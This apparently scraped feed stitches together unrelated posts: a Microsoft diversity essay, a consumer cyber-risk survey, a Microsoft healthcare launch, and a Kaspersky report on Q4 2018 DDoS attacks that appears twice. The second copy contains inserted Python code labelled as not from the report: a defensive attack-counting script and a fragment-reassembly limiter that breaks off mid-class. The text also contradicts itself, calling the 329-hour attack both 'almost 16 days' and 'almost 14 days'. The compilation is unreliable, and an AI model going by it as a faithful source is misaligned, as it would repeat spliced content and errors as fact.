
Black History Month: A time to lift each other up

As a child of “First to’s” (First African-American to command the U.S. Army Old Guard, First African-American to be selected National Elementary School Principal of the Year by President Bill Clinton), my family is deeply steeped in the history of African-American culture and civil rights in the United States, emanating from northern cities (Philadelphia, Pa. and Gary, Ind.) and the deep south (Hayneville, Ala.). I have been raised with a belief in the verse that “to whom much is given, much is required,” and a commitment to give back to our society, honoring those who paved a path forward for us.

When I look around our country today, I am so pleased to see how diversity and inclusion have moved from a concept to an expectation, embedded in every industry and sector of our society. I see leaders speaking up and actively listening to the feedback on what it takes to create diverse and inclusive environments. Mostly, I see regular citizens showing up, rediscovering their voice, sharing their stories, and demanding inclusion and equality – not just for people of color, but for groups of all kinds.

Every February during Black History Month, a 28-day window provides an opportunity for our nation, our company, and each of us to pause and take stock of the condition and progress of Black people and other minority populations. We can celebrate the achievements and contributions of so many and, at the same time, lament the increase in violence and hate crimes, inflammatory discourse in our political arena and sense of increasing polarization across our country.

At Microsoft, we have made the long-term commitment to build and sustain a culture that fosters an inclusive working environment, which will enable our employees to do their best work and serve the diverse needs of our customers around the world. We also are committed to engaging in and advancing diversity and inclusion conversations in communities where we believe we can help empower people.

Black History Month presents us with an opportunity to engage in diversity and inclusion dialogues across all minority groups.

  • At Microsoft, we kicked off the month with our Blacks at Microsoft (BAM) chapter ringing the Nasdaq bell on Wall Street for the second consecutive year. As a direct result of the impact our team had last year, Nasdaq has created its own employee network called GLOBE – Global Link of Black Employees.
  • Next week, I will share the stage with civil rights activist, Reverend Jesse Jackson, at the Wall Street Project, which strives to ensure equal opportunities for culturally diverse employees, entrepreneurs and consumers.
  • Reshma Saujani, who founded Girls Who Code with the single mission of closing the gender gap in technology, will be speaking with Microsoft employees later this month.
  • We celebrate the passionate young gamers who demonstrated to everyone that a level playing field is possible with the help of their friends, family and adaptive technology.
  • At the upcoming BAM conference, we will recognize the pioneers who started the affinity group 30 years ago – the first employee group of its kind.

I count myself incredibly fortunate to work at a company that embodies many of the principles my parents instilled in me, which have stood the test of time as we continue to engage in the diversity and inclusion dialogue: set the bar high and exceed it, approach the world with a service mentality and, above all, lift each other up.

The post Black History Month: A time to lift each other up appeared first on The Official Microsoft Blog.

Nearly Half Of Consumers Concerned About Cyber Risks.

Europ Assistance’s Cyber Barometer, a survey conducted by LEXIS that explores consumer sentiment on cyber security across nine countries, has found that 46% of consumers are worried about cybercrime. This number rises to 49 percent for respondents with elderly parents and 54 percent for those with children.

Nearly one third of respondents (31%) feel exposed to cyber security issues and even more so (38%) when it comes to their children’s identity. Concern is the highest in Southern Europe with Spain (47%) and Italy (39%) feeling exposed. Just over a quarter (26%) of respondents indicated that they knew someone who has been the victim of an attack against their personal data while 82 percent of respondents consider an attack against their personal data to be “very stressful,” ranking above incidents such as a car accident.

A Lack Of Digital Protection
While concern is high, the survey has also discovered that protection is often neglected. Less than one-third of those questioned said that they frequently change their passwords and digital credentials and, even more alarmingly, only half of consumers have anti-virus and anti-malware protection on their smartphone or tablet – a worrisome statistic considering these devices account for half of global web traffic.

Forty-five percent of respondents said they wouldn’t know how to fix their situation if their personal data was compromised and 48 percent feel that companies and institutions are not doing enough to protect their individual information.

Awareness And Willingness To Purchase Solutions Is On The Rise
Americans are more aware of identity protection solutions (65%) than Europeans (40%) but consumers are ready to take steps to protect themselves online when aware of the options. More than half of respondents (55%) indicated that they have a positive opinion of cyber and digital protection services and this number rose to 61 percent for those with children and 57 percent for those with elderly parents. Consumers are interested in Alerting Services (57%), 24/7 Assistance Services (54%), Prevention Services (47%), and Monitoring Services (48%).

Antoine Parisi, CEO of Europ Assistance: “Consumers are now more aware of threats to their personal information and while the mounting concerns they have are valid, it is our mission to protect people from any stressful situation. With digital services playing such a key role in our daily lives, we have developed a unique service to protect the identities and personal data of our customers from any type of cybercrime.”

ABOUT THE EUROP ASSISTANCE – LEXIS CYBER BAROMETER
The 2019 edition of the Cyber Barometer from Europ Assistance and LEXIS was conducted in 9 countries: the United States, Italy, France, Spain, Switzerland, Austria, Hungary, Czech Republic, and Romania. In each country, 800 consumers aged 25-75 took part in a fifteen-minute online questionnaire tailored to that country. The survey was conducted between November and December 2018 and investigated four key topics: online activities and personal protection strategies, worries regarding web and digital activities, their valuation of a cyber and digital protection service, and their intentions to buy such a service.

ABOUT EUROP ASSISTANCE GROUP
Founded in 1963, Europ Assistance, the inventor of assistance, supports over 300 million customers in 208 countries thanks to our network of 750,000 approved providers and 35 assistance centres. Our mission is to bring people or corporates from distress to relief – anytime, anywhere. We provide roadside assistance, travel assistance and insurance, as well as personal assistance services such as the protection of the elderly, the protection of digital identity, telemedicine and the Conciergerie. The vision of our 7,530 employees is to be the most reliable care company in the world. Europ Assistance is part of the Generali Group, one of the world’s leading insurers.

The post Nearly Half Of Consumers Concerned About Cyber Risks. appeared first on IT Security Guru.

Microsoft for Healthcare: technology and collaboration for better experiences, insights and care

The healthcare industry’s leading minds are getting ready to educate, intrigue, and inspire attendees next week at the HIMSS19 conference—a leading healthcare IT event in the US. We expect to see many innovative ideas and solutions to the most prevalent and persistent challenges in modern health, and we are excited to show new technologies making a real difference in people’s lives and demonstrate Microsoft’s commitment to transforming how healthcare is experienced and delivered.

Over the last few years, we have been learning alongside industry experts and making steady progress in helping health organizations navigate complex technology transformations. We have been so pleased by the enthusiastic response of the providers, payors, software developers, device manufacturers and pharmaceutical companies we’ve been working with.

But what drives us most is the profound impact on people. As we all look for more personalized and transparent approaches for healthcare services, technology transformation will help providers deliver modern patient experiences that promote patient engagement, satisfaction, and well-being while increasing the chances of more successful treatment.

This year at HIMSS, we will talk about how Microsoft’s technology and partnerships are helping empower care teams, improve clinical and operational outcomes and advance precision healthcare, with a specific focus on putting people’s privacy at the center. To kick things off, today we’re announcing several new innovations supporting the industry’s transformation:

  • Microsoft 365 for health organizations: New capabilities in Microsoft Teams that enable healthcare teams to communicate and collaborate in a secure hub for teamwork, and ultimately improve patient care.
  • Microsoft Healthcare Bot: Now generally available, this service helps organizations create AI-powered, compliant virtual assistants and chatbots for a variety of healthcare experiences.
  • Azure API for FHIR®: A new tool to help health systems interoperate and share data in the cloud.

Empowering health organizations with secure messaging and AI-powered tools

People are at the heart of healthcare – physicians, nurses, clinicians and of course, their patients. We are committed to empowering care teams with the tools they need to deliver their best care as well as empowering people as they interact with various aspects of the healthcare system.

When it comes to secure communications, many clinicians report having to choose between convenience and compliance. Adhering to compliance has often meant having to wait for critical information at the point of care. Conversely, many clinicians have turned to consumer messaging apps that facilitate communication but can compromise security.

Microsoft is working hard to ensure convenience and compliance are no longer a zero-sum equation. Today, we are announcing new capabilities in Microsoft Teams, a secure hub for teamwork that enables secure messaging and collaboration workflows that tap the wealth of patient information housed in electronic medical records.

Enable secure workflows in Microsoft Teams: The new priority notifications feature in Teams alerts a recipient of an urgent message on their mobile and desktop devices until a response is received, every two minutes for up to 20 minutes; message delegation enables clinical staff members to delegate their messages to another recipient when they are in surgery or otherwise unavailable. We are also announcing the ability to integrate FHIR-enabled electronic health records (EHR) data with Teams. The ability to view EHR data is enabled through partnerships with leading interoperability providers, including Dapasoft, Datica, Infor Cloverleaf, Kno2 and Redox. Clinical or hospital staff can securely access patient records in the same app where they can take notes, message with other team members, and start a video meeting, all in a single place to coordinate care.

For health organizations looking to optimize operational processes or create new experiences for their people and patients, we are also announcing the Microsoft Healthcare Bot general availability.

Microsoft Healthcare Bot: The Microsoft Healthcare Bot service is now generally available after first being introduced as a research project in 2017. It is designed to empower healthcare organizations to build and deploy compliant, AI-powered virtual health assistants and chatbots, and includes important features like healthcare intelligence, medical content and terminology, and a built-in symptom checker. The Microsoft Healthcare Bot service is fully extensible to help organizations adjust the bot to solve their own business problems, and can connect to health systems, like EHRs. In addition to partners like Premera, today we are announcing bots available, or available soon, from Quest Diagnostics, Children’s Healthcare of Atlanta and Clalit Health Services.

Securely connecting data for better clinical and operational outcomes

Our bodies are a lot like complex computers, and each interaction with today’s health system creates a new data point. These data points are often spread across multiple records, with valuable insights somewhat hidden in silos. Microsoft is committed to helping address this opportunity by developing technology that connects data and surfaces important insights at exactly the right time, with privacy and security at the core.

A better-connected healthcare system would provide clinicians with more complete profiles of their patients, researchers with more complete data to study, and individuals with more information to take ownership over their health. I hear this often from leading experts in the research and care delivery communities.

With this in mind, today we’re announcing the Azure API for FHIR, a tool to help health organizations better connect systems and harness the power of data in the cloud.

Azure API for FHIR: The Azure API for FHIR will provide a method for health systems and data to ‘talk’ – what is known as interoperability – so for example, health records can connect to collaboration tools, pharmacy systems, fitness devices and others far more seamlessly. Data and insights from this more connected system can then be served up when and where they’re needed most.

API is a term for technology that links software programs together. Similar to electrical outlets and plugs, APIs can most easily be compared to the adapters you need to use electronics while traveling in foreign countries. Though technical, its functionality is important to everyone who interacts with today’s healthcare systems, as interoperability is a foundational health technology need.

The Azure API for FHIR is available in public preview, and we have more than 25 technology partners in our early access program that can help health organizations build FHIR-enabled services today.

Advancing precision healthcare

Some of the most exciting breakthroughs at the intersection of science and technology are in precision healthcare. We all stand to gain from a health system that can precisely care for us based on our unique biology, environments and ailments. Cloud and advanced AI are the key tools that will help achieve that future.

To advance precision care, Microsoft continues to invest in a series of services and computational biology projects, including research support tools for next-generation precision healthcare, genomics, immunomics, CRISPR and cellular and molecular biologics.

For example, Microsoft Genomics, which provides accelerated sequencing and secondary analysis, enables research insights for organizations like St. Jude Children’s Research Hospital with the St. Jude Cloud, the world’s largest public repository of pediatric cancer genomics data.

Earlier this year, we published an update on our partnership with Adaptive Biotechnologies, announcing we’ve opened up our joint research to immunosequence 25,000 individuals, targeting ovarian cancer, pancreatic cancer, celiac disease, type 1 diabetes and Lyme disease.

Work also continues on several Microsoft Research projects, including intelligent scribe Project EmpowerMD, medical imaging Project InnerEye, machine reading Project Hanover and metagenomics Project Premonition. These projects are pushing the boundaries of how technology can be applied in healthcare and we are excited to see how they might be used by health organizations in the future.

Working with the experts

Improving healthcare is not a singular or silver bullet effort. Microsoft’s ambition is not to be a healthcare provider, but to enable and empower those who are doing good things for people around the world. We see strategic alliances with leaders like Walgreens Boots Alliance, Allscripts, Hill-Rom, Novarad and others leading the way, with support from our thousands of technology partners. Here are a few examples:

  • Walgreens Boots Alliance: Walgreens Boots Alliance (WBA) and Microsoft announced a strategic partnership aimed at transforming health care delivery. Our companies will combine the power of Microsoft’s cloud and AI technologies, health care investments, and retail solutions with WBA’s customer reach, convenient locations, outpatient health care services, and industry expertise with the goal of making health care delivery more personal, affordable and accessible for people around the world.
  • Veradigm: Veradigm, an Allscripts company, and Microsoft announced a collaboration focused on implementing an innovative, integrated model for clinical research, aiming to enhance clinical research design, conduct studies more efficiently and improve the research provider and participant experience.
  • Hill-Rom: Hill-Rom and Microsoft announced a collaboration to bring advanced, actionable point-of-care data and solutions to caregivers and healthcare provider organizations. Our collaboration will combine Hill-Rom’s deep clinical knowledge and streaming operational data from medical devices with Microsoft’s cloud, IoT and AI technologies to help drive enhanced patient outcomes.
  • Novarad: Novarad, a healthcare enterprise imaging company, recently obtained 510(k) clearance from the FDA for the OpenSight Augmented Reality System for Microsoft HoloLens. OpenSight received pre-operative clearance for augmented reality usage in surgical planning, giving physicians access to a new solution that can improve surgical procedures by enhancing accuracy and shortening operative times.
  • ThoughtWire: ThoughtWire is helping save lives with its EarlyWarning application, designed to preempt and prevent patients from suffering cardiac arrest in hospitals. This solution has already reduced code blue calls, which signal a risk of cardiac arrest, by 61 percent at Hamilton Health Sciences, a medical group of seven hospitals and a cancer center. ThoughtWire will deliver the EarlyWarning app, running on Microsoft Azure, to health systems at scale.
  • Innovaccer: Innovaccer is a healthcare data activation platform company working towards solving data interoperability challenges in healthcare and helping health systems enhance their clinical and financial outcomes with a data-first approach. Innovaccer is a portfolio company of M12, Microsoft’s venture fund.

The future is bright – a more connected future to deliver better experiences, insights and care. We are looking forward to meeting many of you next week at HIMSS19 and sharing more about what we are working on. Please be sure to stop by our booth No. 2500 to see our solutions in action, and follow our HIMSS19 story on @Health_IT to learn more.

The post Microsoft for Healthcare: technology and collaboration for better experiences, insights and care appeared first on The Official Microsoft Blog.

DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which for a change included not only Mirai clones. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (for example, one of the detected samples carried out SYN flooding). In October, Chalubo began to be seen more often in the wild; researchers detected versions built for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in the execution of YARN remote commands. This bot is not very complex technically, but dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What’s more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters, but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to gather these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it works fine with Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.

Another promising attack method uses the CoAP protocol approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP is based on the UDP protocol, it has inherited all the latter’s defects, which means it can be harnessed to boost DDoS attacks. Until now, this has not been a significant problem; however, experts note that during the November 2017–November 2018 period, the number of devices using CoAP increased almost 100 times, which is a major cause for concern.

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Borrowing code from this kindred service, the platform is dangerous for its simplicity, low cost, and relative power: For just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was utilized in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDoS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison — though not yet for these incidents, but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017)

The average duration of attacks in 2018 grew steadily over the year: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

Distribution of attack duration by type, 2018

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients will seek out more professional implementers.

Statistics

Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.
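The counting rule from the two methodology paragraphs above (same botnet and target merge into one attack while gaps stay under 24 hours; a gap of 24 hours or more, or a different botnet, starts a new attack; unique targets are counted by IP) implemented over a constructed feed of intercepted C&C commands. This is an added example, not Kaspersky's DDoS Intelligence code; the feed format, botnet labels and addresses are all assumptions.

```python
"""Attack counting per the report's methodology (added example, not
Kaspersky's own code). Input: one constructed 'timestamp botnet target'
record per line, as a botnet-tracking system might log C&C commands."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# A gap of 24 hours or more between two commands starts a new attack.
SAME_ATTACK_GAP = timedelta(hours=24)

# Constructed sample (documentation-range IPs, made-up botnet labels).
# Gaps are chosen to exercise every branch of the rule.
SAMPLE_COMMANDS = """
# timestamp            botnet   target
2018-10-16T08:00:00    mirai-a  203.0.113.10
2018-10-16T10:00:00    mirai-a  203.0.113.10
2018-10-17T09:00:00    mirai-a  203.0.113.10
2018-10-18T12:00:00    mirai-a  203.0.113.10
2018-10-16T09:00:00    xor-b    203.0.113.10
2018-12-04T00:00:00    mirai-a  198.51.100.7
2018-12-05T00:00:00    mirai-a  198.51.100.7
"""


def parse_commands(text):
    """Parse the feed into (timestamp, botnet, target) tuples, oldest first."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        stamp, botnet, target = line.split()
        records.append((datetime.fromisoformat(stamp), botnet, target))
    return sorted(records)


def group_attacks(records):
    """Merge commands into attacks:
    same botnet + same target, gap < 24h   -> one attack
    same botnet + same target, gap >= 24h  -> a new attack begins
    different botnet, same target          -> always a separate attack
    """
    stamps_by_key = defaultdict(list)
    for stamp, botnet, target in records:  # records are already time-ordered
        stamps_by_key[(botnet, target)].append(stamp)

    attacks = []
    for (botnet, target), stamps in stamps_by_key.items():
        start = previous = stamps[0]
        for stamp in stamps[1:]:
            if stamp - previous >= SAME_ATTACK_GAP:
                attacks.append(_attack(botnet, target, start, previous))
                start = stamp
            previous = stamp
        attacks.append(_attack(botnet, target, start, previous))
    return attacks


def _attack(botnet, target, start, end):
    return {"botnet": botnet, "target": target, "start": start, "end": end}


def summarize(attacks):
    """Figures the report derives from its attack list: total attacks,
    unique targets (by IP), longest attack in hours, and starts per weekday."""
    longest = max((a["end"] - a["start"] for a in attacks),
                  default=timedelta(0))
    return {
        "attacks": len(attacks),
        "unique_targets": len({a["target"] for a in attacks}),
        "longest_hours": longest.total_seconds() / 3600,
        "by_weekday": Counter(a["start"].strftime("%A") for a in attacks),
    }


if __name__ == "__main__":
    summary = summarize(group_attacks(parse_commands(SAMPLE_COMMANDS)))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Note that an attack merged under this rule can run far longer than 24 hours (the first mirai-a attack in the sample spans 25 hours), which is how multi-day attacks like the 329-hour one in this report arise.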

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

  • China still tops the leaderboard by number of DDoS attacks, but its share fell quite significantly, from 77.67% to 50.43%. The US retained second position (24.90%), and Australia came third (4.5%). The Top 10 waved goodbye to Russia and Singapore, but welcomed Brazil (2.89%) and Saudi Arabia (1.57%).
  • By geographical distribution of targets, the leaders remain China (43.26%), the US (29.14%), and Australia (5.91%). That said, China’s share fell significantly, while all other Top 10 countries increased theirs.
  • Most of the botnet-based attacks last quarter occurred in October; holiday and pre-holiday periods were calmer. In terms of weekly dynamics, attack activity rose mid-week and decreased towards the end.
  • Q4 witnessed the longest attack seen in recent years, lasting almost 16 days (329 hours). In general, the share of short attacks decreased slightly, but the fluctuations were minor.
  • The share of UDP floods increased significantly to almost a third (31.1%) of all attacks. However, SYN flooding is still leading (58.2%).
  • In connection with the rising number of Mirai C&C servers, the shares of the US (43.48%), Britain (7.88%), and the Netherlands (6.79%) increased.

Attack geography

In the last quarter of 2018, China still accounted for most DDoS attacks. However, its share was down by more than 20 p.p.: from 77.67% to 50.43%.

Meanwhile, the share of the US, which took second place, almost doubled to 24.90%. As in the previous quarter, bronze went to Australia. Its share also practically doubled: from 2.27% to 4.5%. Hong Kong’s share rose only slightly (from 1.74% to 1.84%), causing it to drop to sixth place, ceding fourth position to Brazil. The latter’s indicators had been quite modest up to now, but this quarter its share was 2.89%.

An unexpected newcomer in the ranking was Saudi Arabia, whose share climbed to 1.57%, good enough for seventh spot. This time, the Top 10 had no room for Russia and Singapore. South Korea, having ranked in the Top 3 for several years before dropping to 11th in Q3, not only failed to return to the Top 10, but fell even lower, nosediving to 25th.

The shares of the other top-tenners also increased compared with summer and early fall. The same applies to the total share of countries outside the Top 10 — it increased by more than 5 p.p., from 2.83% to 7.90%.

Distribution of DDoS attacks by country, Q3 and Q4 2018

The distribution of targets by country corresponds to the distribution pattern for number of attacks: China still leads, but its share fell by just over 27 p.p., from 70.58% to 43.26%. The US remains second, although its share grew from 17.05% to 29.14%. Third place again belongs to Australia, also with an increased share (5.9%).

Russia and South Korea, until recently considered Top 10 regulars, slipped well down — as in the rating by number of attacks, they finished 17th and 25th, respectively. They were replaced by new entrants Brazil (2.73%) in fourth place and Saudi Arabia (2.23%) in fifth. The shares of all other countries, as in the previous ranking, also rose slightly. Twofold growth was observed in the case of Canada (from 1.09% to 2.21%), whose results in the past few quarters have fluctuated around 1%, never exceeding 1.5%.

The share of the countries outside of Top 10 almost tripled: from 3.64% to 9.32%.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2018

Dynamics of the number of DDoS attacks

Most of the attack peaks occurred at the start of the quarter (October), with another small surge of activity coming in early December. Unlike last year, there were no clear-cut spikes connected to the autumn and winter holidays, rather the opposite: post-festive periods were quieter. The stormiest days were October 16 and 18, and December 4; the calmest was December 27.

Dynamics of the number of DDoS attacks in Q4 2018

Whereas Q3 attacks were distributed relatively evenly over the days of the week, in Q4 the differences were more pronounced. The quietest day was Sunday (12.02% of attacks), the most active was Thursday: 15.74% of DDoS attacks occurred mid-week. Some correlation can be seen here with the distribution of attacks by date: both weekends and holidays in the previous quarter were calmer.

Distribution of DDoS attacks by day of the week, Q3 and Q4 2018

Duration and types of DDoS attacks

The longest Q4 attack we monitored lasted a near record-breaking 329 hours (almost 14 days); for a longer attack, we have to go back to late 2015. That is approximately 1.5 times the duration of the previous quarter’s longest attack of 239 hours (about 10 days).

Compared with the previous quarter, the total share of attacks longer than 140 hours increased only slightly (+0.01 p.p.) to 0.11%. The proportion of relatively long attacks (50–139 hours) also increased, from 0.59% to 1.15%. However, the most significant rise was observed in the category of 5–9 hour attacks: from 5.49% to 9.40%.

Accordingly, the share of short attacks less than 4 hours in duration decreased slightly, to 83.34%. For comparison, in Q3 they accounted for 86.94% of all attacks.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2018

The distribution of attacks by type in the last quarter underwent a bit of a shakeup. SYN flooding remains the most common, but its share dropped from 83.20% to 58.20%. That allowed UDP flooding to increase its share to almost a third of all types of DDoS attacks (31.10%), up from the more modest 11.90% in Q3.

In third place was TCP flooding, whose share also rose — to 8.40%. The share of attacks via HTTP dropped to 2.20%. In last place again, with its share falling to 0.10%, was ICMP flooding.

Distribution of DDoS attacks by type, Q4 2018

The ratio of Windows and Linux botnets barely moved against Q3. The share of Linux botnets increased slightly, up to 97.11%. Accordingly, the share of Windows botnets dropped by the same margin (1.25 p.p.) to 2.89%.

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2018

Botnet distribution geography

The US remains out in front in terms of botnet C&C server hosting, even extending its lead from 37.31% to 43.48%. Slipping to seventh, Russia (4.08%) ceded second place to Britain (7.88%). Bronze went to the Netherlands, whose share increased from 2.24% to 6.79%. Significantly, all this growth is attributable to the rising number of Mirai C&C servers.

Italy and the Czech Republic vacated the Top 10 of botnet-rich countries, while Germany (5.43%) and Romania (3.26%) moved in. China (2.72%) continues to lose ground, clinging on to tenth position in Q4.

Distribution of botnet C&C servers by country, Q4 2018

Conclusion

For the third quarter in a row, the Top 10 ratings of countries by number of attacks, targets, and botnet C&C servers continue to fluctuate. Growth in DDoS activity is strongest where previously it was relatively low, while the once-dominant countries have seen a decline. This could well be the result of successful law enforcement and other initiatives to combat botnets. Another reason could be the emergence of better communications infrastructure in regions where DDoS attacks used to be infeasible.

If the trend continues, next quarter’s Top 10 will likely feature some more new entries, and in the long run, the shares of different countries could start to even out.

Securelist: DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which for a change included not only Mirai clones. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (one of the detected samples, for example, was a SYN flood tool). In October, Chalubo began to be seen more often in the wild; researchers detected versions built for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in YARN's remote command execution. This bot is not very complex technically, but it is dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What's more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but about new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to reassemble these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it also works against Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.
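The defense against the queue exhaustion described above is to bound reassembly state. The toy reassembler below is an added example, not code from the report or from the researchers it cites: it keeps fragments keyed by source, destination and datagram identifier, refuses new fragments once a cap on bytes held in incomplete buffers is reached, and expires idle buffers. The names Fragment, Buffer and BoundedReassembler, the 1000-byte cap, the 30-second timeout and the addresses are assumptions constructed for the demo; on Linux the corresponding real knobs are the sysctls net.ipv4.ipfrag_high_thresh and net.ipv4.ipfrag_time.

```python
"""Toy fragment reassembler with bounded memory (added example, not the
report's code). Fragments that never complete must not pile up without
limit; the cap and timeout below are assumed values for the demo."""
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Fragment:
    src: str
    dst: str
    ident: int       # datagram identifier shared by all its fragments
    offset: int      # byte offset of this fragment's payload in the datagram
    more: bool       # "more fragments" flag; False marks the last fragment
    payload: bytes


@dataclass
class Buffer:
    pieces: Dict[int, bytes] = field(default_factory=dict)  # offset -> payload
    total_len: Optional[int] = None   # known once the last fragment arrives
    held: int = 0                     # bytes this buffer currently holds
    last_seen: float = 0.0


class BoundedReassembler:
    """Reassembles datagrams but never holds more than max_held_bytes of
    incomplete state, and expires buffers idle for longer than timeout."""

    def __init__(self, max_held_bytes: int = 4096, timeout: float = 30.0):
        self.max_held_bytes = max_held_bytes
        self.timeout = timeout
        self.buffers: Dict[tuple, Buffer] = {}
        self.held = 0          # bytes across all incomplete buffers
        self.dropped = 0       # fragments refused because the cap was reached
        self.expired = 0       # buffers discarded by the timeout

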